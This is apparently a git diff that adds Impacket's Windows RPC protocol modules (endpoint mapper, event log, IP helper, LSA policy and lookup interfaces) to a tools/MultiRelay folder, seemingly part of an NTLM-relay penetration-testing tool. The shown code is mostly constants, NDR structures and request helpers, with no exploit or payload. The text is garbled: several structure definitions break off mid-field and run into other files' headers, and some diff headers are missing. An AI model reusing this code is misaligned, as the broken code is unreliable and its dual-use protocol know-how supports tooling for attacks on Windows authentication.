+'5261574A-4572-206E-B268-6B199213B4E4':'[MS-OXCRPC]: Wire Format Protocol', +} + +# Inquire Type +RPC_C_EP_ALL_ELTS = 0x0 +RPC_C_EP_MATCH_BY_IF = 0x1 +RPC_C_EP_MATH_BY_OBJ = 0x2 +RPC_C_EP_MATH_BY_BOTH = 0x1 + +# Vers Option +RPC_C_VERS_ALL = 0x1 +RPC_C_VERS_COMPATIBLE = 0x2 +RPC_C_VERS_EXACT = 0x3 +RPC_C_VERS_MARJOR_ONLY= 0x4 +RPC_C_VERS_UPTO = 0x5 + +# Search +RPC_NO_MORE_ELEMENTS = 0x16c9a0d6 + +# Floors constants +FLOOR_UUID_IDENTIFIER = 0x0d +# Protocol Identifiers +FLOOR_RPCV5_IDENTIFIER = 0x0b # DCERPC Connection Oriented v.5 +FLOOR_MSNP_IDENTIFIER = 0x0c # MS Named Pipes (LRPC) +# Pipe Identifier +FLOOR_NBNP_IDENTIFIER = 0x0f # NetBIOS Named Pipe +# HostName Identifier +FLOOR_MSNB_IDENTIFIER = 0x11 # MS NetBIOS HostName +# PortAddr Identifier +FLOOR_TCPPORT_IDENTIFIER = 0x07 +# HTTP Protocol +FLOOR_HTTP_IDENTIFIER = 0x1f + +################################################################################ +# STRUCTURES +################################################################################ + +# Tower Floors: As states in C706: +# This appendix defines the rules for encoding an protocol_tower_t (abstract) +# into the twr_t.tower_octet_string and twr_p_t->tower_octet_string fields +# (concrete). For historical reasons, this cannot be done using the standard NDR +# encoding rules for marshalling and unmarshalling. A special encoding is +# required. +# Note that the twr_t and twr_p_t are mashalled as standard IDL data types, +# encoded in the standard transfer syntax (for example, NDR). As far as IDL and +# NDR are concerned, tower_octet_string is simply an opaque conformant byte +# array. This section only defines how to construct this opaque open array of +# octets, which contains the actual protocol tower information. +# The tower_octet_string[ ] is a variable length array of octets that encodes +# a single, complete protocol tower. It is encoded as follows: +# * Addresses increase, reading from left to right. +# * Each tower_octet_string begins with a 2-byte floor count, encoded +# little-endian, followed by the tower floors as follows: +# +-------------+---------+---------+---------+---------+---------+ +# | floorcount | floor1 | floor2 | floor3 | ... | floorn | +# +-------------+---------+---------+---------+---------+---------+ +# The number of tower floors is specific to the particular protocol tower, +# also known as a protseq. +# * Eachtowerfloorcontainsthefollowing: +# |<- tower floor left hand side ->|<- tower floor right hand side ->| +# +------------+-----------------------+------------+----------------------+ +# | LHS byte | protocol identifier | RHS byte | related or address | +# | count | data | count | data | +# +------------+-----------------------+------------+----------------------+ +# The LHS (Left Hand Side) of the floor contains protocol identifier information. +# Protocol identifier values and construction rules are defined in Appendix I. +# The RHS (Right Hand Side) of the floor contains related or addressing +# information. The type and encoding for the currently defined protocol +# identifiers are given in Appendix I. +# The floor count, LHS byte count and RHS byte count are all 2-bytes, +# in little endian format. +# +# So.. we're gonna use Structure to solve this + +# Standard Floor Assignments +class EPMFloor(Structure): + structure = ( + ('LHSByteCount','H=0'), + ) + +EPMFloors = [ +EPMRPCInterface, +EPMRPCDataRepresentation, +EPMFloor, +EPMFloor, +EPMFloor, +EPMFloor +] + +class EPMTower(Structure): + structure = ( + ('NumberOfFloors','. +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray +from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE +from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY +from impacket.structure import Structure +from impacket import nt_errors +from impacket.uuid import uuidtup_to_bin +from impacket.dcerpc.v5.rpcrt import DCERPCException + +MSRPC_UUID_EVEN = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in nt_errors.ERROR_MESSAGES: + error_msg_short = nt_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] + return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 2.2.2 EventType +EVENTLOG_SUCCESS = 0x0000 +EVENTLOG_ERROR_TYPE = 0x0001 +EVENTLOG_WARNING_TYPE = 0x0002 +EVENTLOG_INFORMATION_TYPE = 0x0004 +EVENTLOG_AUDIT_SUCCESS = 0x0008 +EVENTLOG_AUDIT_FAILURE = 0x0010 + +# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W +#EVENTLOG_HANDLE_A +EVENTLOG_HANDLE_W = LPWSTR + +# 2.2.9 Constants Used in Method Definitions +MAX_STRINGS = 0x00000100 +MAX_SINGLE_EVENT = 0x0003FFFF +MAX_BATCH_BUFF = 0x0007FFFF + +# 3.1.4.7 ElfrReadELW (Opnum 10) +EVENTLOG_SEQUENTIAL_READ = 0x00000001 +EVENTLOG_SEEK_READ = 0x00000002 + +EVENTLOG_FORWARDS_READ = 0x00000004 +EVENTLOG_BACKWARDS_READ = 0x00000008 + +################################################################################ +# STRUCTURES +################################################################################ + +class IELF_HANDLE(NDRSTRUCT): + structure = ( + ('Data','20s=""'), + ) + def getAlignment(self): + return 1 + +# 2.2.3 EVENTLOGRECORD +class EVENTLOGRECORD(Structure): + structure = ( + ('Length','. +# There are test cases for them too. +# +from impacket import system_errors +from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE +from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.uuid import uuidtup_to_bin + +MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__(self): + key = self.error_code + if key in system_errors.ERROR_MESSAGES: + error_msg_short = system_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] + return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ + +# Evt Path Flags +EvtQueryChannelName = 0x00000001 +EvtQueryFilePath = 0x00000002 +EvtReadOldestToNewest = 0x00000100 +EvtReadNewestToOldest = 0x00000200 + +################################################################################ +# STRUCTURES +################################################################################ + +class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT): + align = 1 + structure = ( + ('Data', '20s=""'), + ) + +class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER): + referent = ( + ('Data', CONTEXT_HANDLE_LOG_HANDLE), + ) + +class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT): + align = 1 + structure = ( + ('Data', '20s=""'), + ) + +class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER): + referent = ( + ('Data', CONTEXT_HANDLE_LOG_QUERY), + ) + +class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER): + referent = ( + ('Data', PCONTEXT_HANDLE_LOG_QUERY), + ) + +class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT): + align = 1 + structure = ( + ('Data', '20s=""'), + ) + +class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER): + referent = ( + ('Data', CONTEXT_HANDLE_OPERATION_CONTROL), + ) + +# 2.2.11 EvtRpcQueryChannelInfo +class EvtRpcQueryChannelInfo(NDRSTRUCT): + structure = ( + ('Name', LPWSTR), + ('Status', DWORD), + ) + +class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray): + item = EvtRpcQueryChannelInfo + +class LPEvtRpcQueryChannelInfoArray(NDRPOINTER): + referent = ( + ('Data', EvtRpcQueryChannelInfoArray) + ) + +class RPC_INFO(NDRSTRUCT): + structure = ( + ('Error', DWORD), + ('SubError', DWORD), + ('SubErrorParam', DWORD), + ) + +class PRPC_INFO(NDRPOINTER): + referent = ( + ('Data', RPC_INFO) + ) + +class WSTR_ARRAY(NDRUniVaryingArray): + item = WSTR + +class DWORD_ARRAY(NDRUniVaryingArray): + item = DWORD + +class LPDWORD_ARRAY(NDRPOINTER): + referent = ( + ('Data', DWORD_ARRAY) + ) + +class BYTE_ARRAY(NDRUniVaryingArray): + item = 'c' + +class CBYTE_ARRAY(NDRUniVaryingArray): + item = BYTE + +class CDWORD_ARRAY(NDRUniConformantArray): + item = DWORD + +class LPBYTE_ARRAY(NDRPOINTER): + referent = ( + ('Data', CBYTE_ARRAY) + ) + +class ULONG_ARRAY(NDRUniVaryingArray): + item = ULONG + +# 2.3.1 EVENT_DESCRIPTOR +class EVENT_DESCRIPTOR(NDRSTRUCT): + structure = ( + ('Id', WORD), + ('Version', BYTE), + ('Channel', BYTE), + ('LevelSeverity', BYTE), + ('Opcode', BYTE), + ('Task', WORD), + ('Keyword', ULONG), + ) + +class BOOKMARK(NDRSTRUCT): + structure = ( + ('BookmarkSize', DWORD), + ('HeaderSize', ' / Positive Technologies (https://www.ptsecurity.com/) +# +# Description: +# Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network) + +from socket import inet_aton + +from impacket import uuid +from impacket import hresult_errors +from impacket.uuid import uuidtup_to_bin +from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL +from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray +from impacket.dcerpc.v5.rpcrt import DCERPCException + +MSRPC_UUID_IPHLP_IP_TRANSITION = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0')) + +# RPC_IF_ALLOW_LOCAL_ONLY +MSRPC_UUID_IPHLP_TEREDO = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0')) +MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in hresult_errors.ERROR_MESSAGES: + error_msg_short = hresult_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1] + return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ + +# Notification types +NOTIFICATION_ISATAP_CONFIGURATION_CHANGE = 0 +NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE = 1 +NOTIFICATION_TEREDO_CONFIGURATION_CHANGE = 2 +NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE = 3 +NOTIFICATION_PORT_CONFIGURATION_CHANGE = 4 +NOTIFICATION_DNS64_CONFIGURATION_CHANGE = 5 +NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6 + +################################################################################ +# STRUCTURES +################################################################################ + +class BYTE_ARRAY(NDRUniConformantArray): + item = 'c' + +################################################################################ +# RPC CALLS +################################################################################ + +# Opnum 0 +class IpTransitionProtocolApplyConfigChanges(NDRCALL): + opnum = 0 + structure = ( + ('NotificationNum', BYTE), + ) + +class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL): + structure = ( + ('ErrorCode', ULONG), + ) + +# Opnum 1 +class IpTransitionProtocolApplyConfigChangesEx(NDRCALL): + opnum = 1 + structure = ( + ('NotificationNum', BYTE), + ('DataLength', ULONG), + ('Data', BYTE_ARRAY), + ) + +class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL): + structure = ( + ('ErrorCode', ULONG), + ) + +# Opnum 2 +class IpTransitionCreatev6Inv4Tunnel(NDRCALL): + opnum = 2 + structure = ( + ('LocalAddress', "4s=''"), + ('RemoteAddress', "4s=''"), + ('InterfaceName', WSTR), + ) + +class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL): + structure = ( + ('ErrorCode', ULONG), + ) + +# Opnum 3 +class IpTransitionDeletev6Inv4Tunnel(NDRCALL): + opnum = 3 + structure = ( + ('TunnelGuid', GUID), + ) + +class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL): + structure = ( + ('ErrorCode', ULONG), + ) + +################################################################################ +# OPNUMs and their corresponding structures +################################################################################ + +OPNUMS = { + 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse), + 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse), + 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse), + 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse) +} + +################################################################################ +# HELPER FUNCTIONS +################################################################################ +def checkNullString(string): + if string == NULL: + return string + + if string[-1:] != '\x00': + return string + '\x00' + else: + return string + +# For all notifications except EX +def hIpTransitionProtocolApplyConfigChanges(dce, notification_num): + request = IpTransitionProtocolApplyConfigChanges() + request['NotificationNum'] = notification_num + + return dce.request(request) + +# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX +# No admin required +def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data): + request = IpTransitionProtocolApplyConfigChangesEx() + request['NotificationNum'] = notification_num + request['DataLength'] = len(notification_data) + request['Data'] = notification_data + + return dce.request(request) + +# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5 +def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name): + request = IpTransitionCreatev6Inv4Tunnel() + request['LocalAddress'] = inet_aton(local_address) + request['RemoteAddress'] = inet_aton(remote_address) + + request['InterfaceName'] = checkNullString(interface_name) + request.fields['InterfaceName'].fields['MaximumCount'] = 256 + + return dce.request(request) + +def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid): + request = IpTransitionDeletev6Inv4Tunnel() + request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid) + + return dce.request(request) diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py new file mode 100644 index 0000000..6aeec63 --- /dev/null +++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py @@ -0,0 +1,1665 @@ +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: Alberto Solino (@agsolino) +# +# Description: +# [MS-LSAD] Interface implementation +# +# Best way to learn how to use these calls is to grab the protocol standard +# so you understand what the call does, and then read the test case located +# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC +# +# Some calls have helper functions, which makes it even easier to use. +# They are located at the end of this file. +# Helper functions start with "h". +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from impacket.dcerpc.v5.ndr import NDRCALL, NDRENUM, NDRUNION, NDRUniConformantVaryingArray, NDRPOINTER, NDR, NDRSTRUCT, \ + NDRUniConformantArray +from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, STR, LUID, LONG, ULONG, RPC_UNICODE_STRING, PRPC_SID, LPBYTE, \ + LARGE_INTEGER, NTSTATUS, RPC_SID, ACCESS_MASK, UCHAR, PRPC_UNICODE_STRING, PLARGE_INTEGER, USHORT, \ + SECURITY_INFORMATION, NULL, MAXIMUM_ALLOWED, GUID, SECURITY_DESCRIPTOR, OWNER_SECURITY_INFORMATION +from impacket import nt_errors +from impacket.uuid import uuidtup_to_bin +from impacket.dcerpc.v5.enum import Enum +from impacket.dcerpc.v5.rpcrt import DCERPCException + +MSRPC_UUID_LSAD = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in nt_errors.ERROR_MESSAGES: + error_msg_short = nt_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] + return 'LSAD SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'LSAD SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 2.2.1.1.2 ACCESS_MASK for Policy Objects +POLICY_VIEW_LOCAL_INFORMATION = 0x00000001 +POLICY_VIEW_AUDIT_INFORMATION = 0x00000002 +POLICY_GET_PRIVATE_INFORMATION = 0x00000004 +POLICY_TRUST_ADMIN = 0x00000008 +POLICY_CREATE_ACCOUNT = 0x00000010 +POLICY_CREATE_SECRET = 0x00000020 +POLICY_CREATE_PRIVILEGE = 0x00000040 +POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080 +POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100 +POLICY_AUDIT_LOG_ADMIN = 0x00000200 +POLICY_SERVER_ADMIN = 0x00000400 +POLICY_LOOKUP_NAMES = 0x00000800 +POLICY_NOTIFICATION = 0x00001000 + +# 2.2.1.1.3 ACCESS_MASK for Account Objects +ACCOUNT_VIEW = 0x00000001 +ACCOUNT_ADJUST_PRIVILEGES = 0x00000002 +ACCOUNT_ADJUST_QUOTAS = 0x00000004 +ACCOUNT_ADJUST_SYSTEM_ACCESS = 0x00000008 + +# 2.2.1.1.4 ACCESS_MASK for Secret Objects +SECRET_SET_VALUE = 0x00000001 +SECRET_QUERY_VALUE = 0x00000002 + +# 2.2.1.1.5 ACCESS_MASK for Trusted Domain Objects +TRUSTED_QUERY_DOMAIN_NAME = 0x00000001 +TRUSTED_QUERY_CONTROLLERS = 0x00000002 +TRUSTED_SET_CONTROLLERS = 0x00000004 +TRUSTED_QUERY_POSIX = 0x00000008 +TRUSTED_SET_POSIX = 0x00000010 +TRUSTED_SET_AUTH = 0x00000020 +TRUSTED_QUERY_AUTH = 0x00000040 + +# 2.2.1.2 POLICY_SYSTEM_ACCESS_MODE +POLICY_MODE_INTERACTIVE = 0x00000001 +POLICY_MODE_NETWORK = 0x00000002 +POLICY_MODE_BATCH = 0x00000004 +POLICY_MODE_SERVICE = 0x00000010 +POLICY_MODE_DENY_INTERACTIVE = 0x00000040 +POLICY_MODE_DENY_NETWORK = 0x00000080 +POLICY_MODE_DENY_BATCH = 0x00000100 +POLICY_MODE_DENY_SERVICE = 0x00000200 +POLICY_MODE_REMOTE_INTERACTIVE = 0x00000400 +POLICY_MODE_DENY_REMOTE_INTERACTIVE = 0x00000800 +POLICY_MODE_ALL = 0x00000FF7 +POLICY_MODE_ALL_NT4 = 0x00000037 + +# 2.2.4.4 LSAPR_POLICY_AUDIT_EVENTS_INFO +# EventAuditingOptions +POLICY_AUDIT_EVENT_UNCHANGED = 0x00000000 +POLICY_AUDIT_EVENT_NONE = 0x00000004 +POLICY_AUDIT_EVENT_SUCCESS = 0x00000001 +POLICY_AUDIT_EVENT_FAILURE = 0x00000002 + +# 2.2.4.19 POLICY_DOMAIN_KERBEROS_TICKET_INFO +# AuthenticationOptions +POLICY_KERBEROS_VALIDATE_CLIENT = 0x00000080 + +# 2.2.7.21 LSA_FOREST_TRUST_RECORD +# Flags +LSA_TLN_DISABLED_NEW = 0x00000001 +LSA_TLN_DISABLED_ADMIN = 0x00000002 +LSA_TLN_DISABLED_CONFLICT = 0x00000004 +LSA_SID_DISABLED_ADMIN = 0x00000001 +LSA_SID_DISABLED_CONFLICT = 0x00000002 +LSA_NB_DISABLED_ADMIN = 0x00000004 +LSA_NB_DISABLED_CONFLICT = 0x00000008 +LSA_FTRECORD_DISABLED_REASONS = 0x0000FFFF + +################################################################################ +# STRUCTURES +################################################################################ +# 2.2.2.1 LSAPR_HANDLE +class LSAPR_HANDLE(NDRSTRUCT): + align = 1 + structure = ( + ('Data','20s=""'), + ) + +# 2.2.2.3 LSA_UNICODE_STRING +LSA_UNICODE_STRING = RPC_UNICODE_STRING + +# 2.2.3.1 STRING +class STRING(NDRSTRUCT): + commonHdr = ( + ('MaximumLength','. +# There are test cases for them too. +# +from impacket import nt_errors +from impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \ + NULL +from impacket.dcerpc.v5.enum import Enum +from impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY +from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.dcerpc.v5.samr import SID_NAME_USE +from impacket.uuid import uuidtup_to_bin + +MSRPC_UUID_LSAT = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0')) + +class DCERPCSessionError(DCERPCException): + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__( self ): + key = self.error_code + if key in nt_errors.ERROR_MESSAGES: + error_msg_short = nt_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] + return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +# 2.2.10 ACCESS_MASK +POLICY_LOOKUP_NAMES = 0x00000800 + +################################################################################ +# STRUCTURES +################################################################################ +# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST +class LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY), + ('MaxEntries', ULONG), + ) + +class PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER): + referent = ( + ('Data', LSAPR_REFERENCED_DOMAIN_LIST), + ) + +# 2.2.14 LSA_TRANSLATED_SID +class LSA_TRANSLATED_SID(NDRSTRUCT): + structure = ( + ('Use', SID_NAME_USE), + ('RelativeId', ULONG), + ('DomainIndex', LONG), + ) + +# 2.2.15 LSAPR_TRANSLATED_SIDS +class LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray): + item = LSA_TRANSLATED_SID + +class PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSA_TRANSLATED_SID_ARRAY), + ) + +class LSAPR_TRANSLATED_SIDS(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Sids', PLSA_TRANSLATED_SID_ARRAY), + ) + +# 2.2.16 LSAP_LOOKUP_LEVEL +class LSAP_LOOKUP_LEVEL(NDRENUM): + class enumItems(Enum): + LsapLookupWksta = 1 + LsapLookupPDC = 2 + LsapLookupTDL = 3 + LsapLookupGC = 4 + LsapLookupXForestReferral = 5 + LsapLookupXForestResolve = 6 + LsapLookupRODCReferralToFullDC = 7 + +# 2.2.17 LSAPR_SID_INFORMATION +class LSAPR_SID_INFORMATION(NDRSTRUCT): + structure = ( + ('Sid', PRPC_SID), + ) + +# 2.2.18 LSAPR_SID_ENUM_BUFFER +class LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray): + item = LSAPR_SID_INFORMATION + +class PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSAPR_SID_INFORMATION_ARRAY), + ) + +class LSAPR_SID_ENUM_BUFFER(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY), + ) + +# 2.2.19 LSAPR_TRANSLATED_NAME +class LSAPR_TRANSLATED_NAME(NDRSTRUCT): + structure = ( + ('Use', SID_NAME_USE), + ('Name', RPC_UNICODE_STRING), + ('DomainIndex', LONG), + ) + +# 2.2.20 LSAPR_TRANSLATED_NAMES +class LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray): + item = LSAPR_TRANSLATED_NAME + +class PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSAPR_TRANSLATED_NAME_ARRAY), + ) + +class LSAPR_TRANSLATED_NAMES(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Names', PLSAPR_TRANSLATED_NAME_ARRAY), + ) + +# 2.2.21 LSAPR_TRANSLATED_NAME_EX +class LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT): + structure = ( + ('Use', SID_NAME_USE), + ('Name', RPC_UNICODE_STRING), + ('DomainIndex', LONG), + ('Flags', ULONG), + ) + +# 2.2.22 LSAPR_TRANSLATED_NAMES_EX +class LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray): + item = LSAPR_TRANSLATED_NAME_EX + +class PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY), + ) + +class LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY), + ) + +# 2.2.23 LSAPR_TRANSLATED_SID_EX +class LSAPR_TRANSLATED_SID_EX(NDRSTRUCT): + structure = ( + ('Use', SID_NAME_USE), + ('RelativeId', ULONG), + ('DomainIndex', LONG), + ('Flags', ULONG), + ) + +# 2.2.24 LSAPR_TRANSLATED_SIDS_EX +class LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray): + item = LSAPR_TRANSLATED_SID_EX + +class PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY), + ) + +class LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY), + ) + +# 2.2.25 LSAPR_TRANSLATED_SID_EX2 +class LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT): + structure = ( + ('Use', SID_NAME_USE), + ('Sid', PRPC_SID), + ('DomainIndex', LONG), + ('Flags', ULONG), + ) + +# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2 +class LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray): + item = LSAPR_TRANSLATED_SID_EX2 + +class PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER): + referent = ( + ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY), + ) + +class LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT): + structure = ( + ('Entries', ULONG), + ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY), + ) + +class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray): + item = RPC_UNICODE_STRING + +################################################################################ +# RPC CALLS +################################################################################ +# 3.1.4.4 LsarGetUserName (Opnum 45) +class LsarGetUserName(NDRCALL): + opnum = 45 + structure = ( + ('SystemName', LPWSTR), + ('UserName', PRPC_UNICODE_STRING), + ('DomainName', PRPC_UNICODE_STRING), + ) + +class LsarGetUserNameResponse(NDRCALL): + structure = ( + ('UserName', PRPC_UNICODE_STRING), + ('DomainName', PRPC_UNICODE_STRING), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.5 LsarLookupNames4 (Opnum 77) +class LsarLookupNames4(NDRCALL): + opnum = 77 + structure = ( + ('Count', ULONG), + ('Names', RPC_UNICODE_STRING_ARRAY), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ('LookupOptions', ULONG), + ('ClientRevision', ULONG), + ) + +class LsarLookupNames4Response(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.6 LsarLookupNames3 (Opnum 68) +class LsarLookupNames3(NDRCALL): + opnum = 68 + structure = ( + ('PolicyHandle', LSAPR_HANDLE), + ('Count', ULONG), + ('Names', RPC_UNICODE_STRING_ARRAY), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + ('MappedCount', ULONG), + ('LookupOptions', ULONG), + ('ClientRevision', ULONG), + ) + +class LsarLookupNames3Response(NDRCALL): + structure = ( + ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2), + ('MappedCount', ULONG), + ('ErrorCode', NTSTATUS), + ) + +# 3.1.4.7 LsarLookupNames2 (Opnum 58) +class LsarLookupNames2(NDRCALL): + opnum = 58 + structure = ( + ('PolicyHandle', LSAPR_HANDLE), + ('Count', ULONG), + ('Names', RPC_UNICODE_STRING_ARRAY), + ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX), + ('LookupLevel', LSAP_LOOKUP_LEVEL), + 